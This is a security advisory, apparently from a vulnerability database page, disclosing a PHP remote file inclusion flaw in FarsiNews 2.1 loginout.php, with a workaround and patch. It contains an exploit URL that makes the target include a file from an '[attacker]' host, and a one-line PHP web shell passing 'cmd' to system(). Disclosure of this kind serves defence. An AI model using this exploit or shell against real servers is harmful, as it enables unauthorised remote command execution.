FarsiNews 2.1 PHP Remote File Inclusion

Advisory Content :

Remote File Inclusion in FarsiNews 2.1 and below
Credit:
The information has been provided by Hamid Ebadi
(Hamid Network Security Team) :admin (at) hamid (dot) ir. [email concealed]
The original article can be found at :
http://hamid.ir/security

Vulnerable Systems:
FarsiNews 2.1 Beta 2 and below

Vulnerable Code:
The following lines in loginout.php :
require_once($cutepath."/inc/functions.inc.php");
require_once($cutepath."/data/config.php");

Exploits:
If register_globals=ON has been marked (check
PHP.INI) we can exploit below URL to cause it to
include external file.

The following URL will cause the server to include
external files ( phpshell.txt ):
http://[target]/loginout.php?cmd=dir&cutepath=http://[attacker]/phpshell
.txt?

phpshell.txt
-------------------
<?
system ($_GET['cmd']);
die ("<h3>http://Hamid.ir >> Hamid Ebadi << (Hamid
Network Security Team)</h3> ");
?>
-----[EOF]--------

Workaround:
use FarsiNews 2.5 or for Unofficial Patch , simply add
the following line in the second line of
loginout.php:

if (isset($_REQUEST["cutepath"])){ die("Patched by
Hamid Ebadi -->http://hamid.ir ( Hamid Network
Security Team) "); }

Signature

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

FarsiNews 2.1 PHP Remote File Inclusion